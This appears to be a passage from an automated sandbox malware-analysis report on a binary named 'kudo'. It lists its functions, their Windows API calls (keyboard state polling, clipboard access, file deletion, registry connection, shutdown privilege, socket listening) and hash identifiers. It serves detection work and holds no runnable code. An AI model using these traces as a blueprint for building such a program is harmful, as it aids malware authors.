                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 1824444939-438819550
                                                      • Opcode ID: ccd4c261221c333e67bdc041ff11be04ec9d08e294b5c4ea14e83f3816951e54
                                                      • Instruction ID: 060170e47717cf857d68dd7f7f94653b2d0edaec6660e6a92e160fac44e0401e
                                                      • Opcode Fuzzy Hash: ccd4c261221c333e67bdc041ff11be04ec9d08e294b5c4ea14e83f3816951e54
                                                      • Instruction Fuzzy Hash: 1C31C436500219AADB20AF68FC59EEE77ACFF45360F110171FA14E2292DB34DA85CF64
                                                      Function 0086A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0086A20F
                                                      • __swprintf.LIBCMT ref: 0086A231
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0086A26E
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0086A293
                                                      • _memset.LIBCMT ref: 0086A2B2
                                                      • _wcsncpy.LIBCMT ref: 0086A2EE
                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0086A323
                                                      • CloseHandle.KERNEL32(00000000), ref: 0086A32E
                                                      • RemoveDirectoryW.KERNEL32(?), ref: 0086A337
                                                      • CloseHandle.KERNEL32(00000000), ref: 0086A341
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                      • String ID: :$\$\??\%s
                                                      • API String ID: 2733774712-3457252023
                                                      • Opcode ID: 5b78bfe6ce8e03c12c06c77825899d0b918e49df8db2203de7dede2a725327c9
                                                      • Instruction ID: 6d16317e10483618c65df60ac73b902cf940ad030d701f8bc750f1f4ecda4075
                                                      • Opcode Fuzzy Hash: 5b78bfe6ce8e03c12c06c77825899d0b918e49df8db2203de7dede2a725327c9
                                                      • Instruction Fuzzy Hash: 0231B2B5500119ABDB21DFA4DC49FEB77BCFF88701F1040B6F608E2261EB7096848B25
                                                      Function 0088C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0088C1FC
                                                      • GetFocus.USER32 ref: 0088C20C
                                                      • GetDlgCtrlID.USER32(00000000), ref: 0088C217
                                                      • _memset.LIBCMT ref: 0088C342
                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0088C36D
                                                      • GetMenuItemCount.USER32(?), ref: 0088C38D
                                                      • GetMenuItemID.USER32(?,00000000), ref: 0088C3A0
                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0088C3D4
                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0088C41C
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0088C454
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0088C489
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                      • String ID: 0
                                                      • API String ID: 3616455698-4108050209
                                                      • Opcode ID: cdbde6f9eb47777f08d082bd56641fe0c4a91c1424147ae42344350b837f9106
                                                      • Instruction ID: 0356e01dd7b9210e479059e5ed2290877b53723e97e8b922bb7b11ab3731bcd8
                                                      • Opcode Fuzzy Hash: cdbde6f9eb47777f08d082bd56641fe0c4a91c1424147ae42344350b837f9106
                                                      • Instruction Fuzzy Hash: 08816D70208311AFDB20EF18D894A7BBBE4FB88714F00492EFA95D7295D770D945CB62
                                                      Function 008166E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                      • API String ID: 0-4052911093
                                                      • Opcode ID: 5e6183bcc33546d1373d01b70bb06fc1219a03af4a3b8423f5ac4df60a59738d
                                                      • Instruction ID: 445978c7de024f28289768b66f3da7dd69dc504fe5491a863a5db402879e9b75
                                                      • Opcode Fuzzy Hash: 5e6183bcc33546d1373d01b70bb06fc1219a03af4a3b8423f5ac4df60a59738d
                                                      • Instruction Fuzzy Hash: 08727D75E00219DBDF24CF58C8947EEB7B5FF48315F14816AE949EB280EB349A85CB90
                                                      Function 0086001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00860097
                                                      • SetKeyboardState.USER32(?), ref: 00860102
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00860122
                                                      • GetKeyState.USER32(000000A0), ref: 00860139
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00860168
                                                      • GetKeyState.USER32(000000A1), ref: 00860179
                                                      • GetAsyncKeyState.USER32(00000011), ref: 008601A5
                                                      • GetKeyState.USER32(00000011), ref: 008601B3
                                                      • GetAsyncKeyState.USER32(00000012), ref: 008601DC
                                                      • GetKeyState.USER32(00000012), ref: 008601EA
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00860213
                                                      • GetKeyState.USER32(0000005B), ref: 00860221
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: ee95083ed532101aeb6593a681148eb02adc5a098c13af2f905e81e18931ef14
                                                      • Instruction ID: cda3ddec7eb214e7ad85368380abb2c126bc272e96f79a26d0420fdfbca11fd9
                                                      • Opcode Fuzzy Hash: ee95083ed532101aeb6593a681148eb02adc5a098c13af2f905e81e18931ef14
                                                      • Instruction Fuzzy Hash: 9D51ED2090478829FB35D76489147EBBFB4FF12380F094599D5C29A1C3DAA49B8CCF66
                                                      Function 008803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00880E1A: CharUpperBuffW.USER32(?,?), ref: 00880E31
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008804AC
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0088054B
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008805E3
                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00880822
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0088082F
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1240663315-0
                                                      • Opcode ID: ab152bf6911a4b9f7b72245c787a7681e72995dc68e91af77aa7f62ad6f20e7e
                                                      • Instruction ID: 2b8905b69b0dcb28ad91e4c36456f3a3047061a4dad75784f7a7212f8634105d
                                                      • Opcode Fuzzy Hash: ab152bf6911a4b9f7b72245c787a7681e72995dc68e91af77aa7f62ad6f20e7e
                                                      • Instruction Fuzzy Hash: 21E15F71604214AFCB54EF28C891D2ABBE4FF89314B04856DF949D72A2D731E945CF52
                                                      Function 00874164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: ec92419138fee3a896ddd1a13a2dc6f4c9cfef45a472249dda8758886ce86db2
                                                      • Instruction ID: c9a48f12cbb0f6fe96f7938bf648445666cb2034f02c5eadf49cc5d6718afd08
                                                      • Opcode Fuzzy Hash: ec92419138fee3a896ddd1a13a2dc6f4c9cfef45a472249dda8758886ce86db2
                                                      • Instruction Fuzzy Hash: D6217F752002149FDB10AF68EC09B697BA8FF14711F10C029FA4ADB2A3EB30EC51CB55
                                                      Function 008637EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00804750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00804743,?,?,008037AE,?), ref: 00804770
                                                        • Part of subcall function 00864A31: GetFileAttributesW.KERNEL32(?,0086370B), ref: 00864A32
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 008638A3
                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0086394B
                                                      • MoveFileW.KERNEL32(?,?), ref: 0086395E
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0086397B
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0086399D
                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008639B9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 4002782344-1173974218
                                                      • Opcode ID: e34bbb25af7b909d3df8ecc7135b4924a7d3e3a629bee270fe7b69005d28536b
                                                      • Instruction ID: 6b25ce850480e8aa8e0e5ba39cd0898a22387e1732ff58095284d8b9f8d15e5c
                                                      • Opcode Fuzzy Hash: e34bbb25af7b909d3df8ecc7135b4924a7d3e3a629bee270fe7b69005d28536b
                                                      • Instruction Fuzzy Hash: 67514D3180514DAACF05EBA8DD929EDBB79FF15304F600069E406F71A2EB316F09CB62
                                                      Function 0086F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0086F440
                                                      • Sleep.KERNEL32(0000000A), ref: 0086F470
                                                      • _wcscmp.LIBCMT ref: 0086F484
                                                      • _wcscmp.LIBCMT ref: 0086F49F
                                                      • FindNextFileW.KERNEL32(?,?), ref: 0086F53D
                                                      • FindClose.KERNEL32(00000000), ref: 0086F553
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                      • String ID: *.*
                                                      • API String ID: 713712311-438819550
                                                      • Opcode ID: 8fa6cedf0219307591164e6309efe90df68619f8893c82eeb5fb588685ef35fb
                                                      • Instruction ID: b54060951285fb3a72e4105c27a2a701b3725724db73deeb5bf8f11621ec58da
                                                      • Opcode Fuzzy Hash: 8fa6cedf0219307591164e6309efe90df68619f8893c82eeb5fb588685ef35fb
                                                      • Instruction Fuzzy Hash: F7416C71904219AFDF14EF68EC49AEEBBB4FF05314F104466E915E2292EB30DE84CB51
                                                      Function 0088D43E Relevance: 12.3, APIs: 8, Instructions: 257windownativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • GetSystemMetrics.USER32(0000000F), ref: 0088D47C
                                                      • GetSystemMetrics.USER32(0000000F), ref: 0088D49C
                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000), ref: 0088D6D7
                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0088D6F5
                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0088D716
                                                      • ShowWindow.USER32(00000003,00000000), ref: 0088D735
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0088D75A
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 0088D77D
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                                      • String ID:
                                                      • API String ID: 830902736-0
                                                      • Opcode ID: bec3823bd31b24f0b077022a33d977da260ca89b1bcbc60ff0b1dd406e1a80f3
                                                      • Instruction ID: f1db07af3c28e6ba889f04e05b2b7142538fb32d280bc264a109cf1817897a39
                                                      • Opcode Fuzzy Hash: bec3823bd31b24f0b077022a33d977da260ca89b1bcbc60ff0b1dd406e1a80f3
                                                      • Instruction Fuzzy Hash: EEB17A71600219EFDF14EF68C985BAD7BB1FF08711F088169ED58DB295E734A990CB90
                                                      Function 00815760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: cf7caf17b4829385e5b060efdce534b63a084f8972f44e8e678b704bbd946663
                                                      • Instruction ID: 8c17a6aa1abcc66e8b94a90332dee193a9cbed17045e8707a82b202c7b9c4ea5
                                                      • Opcode Fuzzy Hash: cf7caf17b4829385e5b060efdce534b63a084f8972f44e8e678b704bbd946663
                                                      • Instruction Fuzzy Hash: 8D128C70A00609DFDF04DFA9D981AEEB7F9FF88300F104529E846E7291EB35A995CB51
                                                      Function 008651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 008587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0085882B
                                                        • Part of subcall function 008587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00858858
                                                        • Part of subcall function 008587E1: GetLastError.KERNEL32 ref: 00858865
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 008651F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                      • String ID: $@$SeShutdownPrivilege
                                                      • API String ID: 2234035333-194228
                                                      • Opcode ID: 077f183d9143be1a6aec7abcd8f503aae4853b4dfde5be80ee0a2f16b0de75bf
                                                      • Instruction ID: a7d60b134eba51c72c22bb9bed333e3a7782f1834f5b51e5587f1b7245e3928e
                                                      • Opcode Fuzzy Hash: 077f183d9143be1a6aec7abcd8f503aae4853b4dfde5be80ee0a2f16b0de75bf
                                                      • Instruction Fuzzy Hash: 0F012B317916156BF728627CACABFBB7358FB05345F220421FD13E22D2DA511C008690
                                                      Function 00876283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 008762DC
                                                      • WSAGetLastError.WS2_32(00000000), ref: 008762EB
                                                      • bind.WS2_32(00000000,?,00000010), ref: 00876307
                                                      • listen.WS2_32(00000000,00000005), ref: 00876316
                                                      • WSAGetLastError.WS2_32(00000000), ref: 00876330
                                                      • closesocket.WS2_32(00000000), ref: 00876344
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
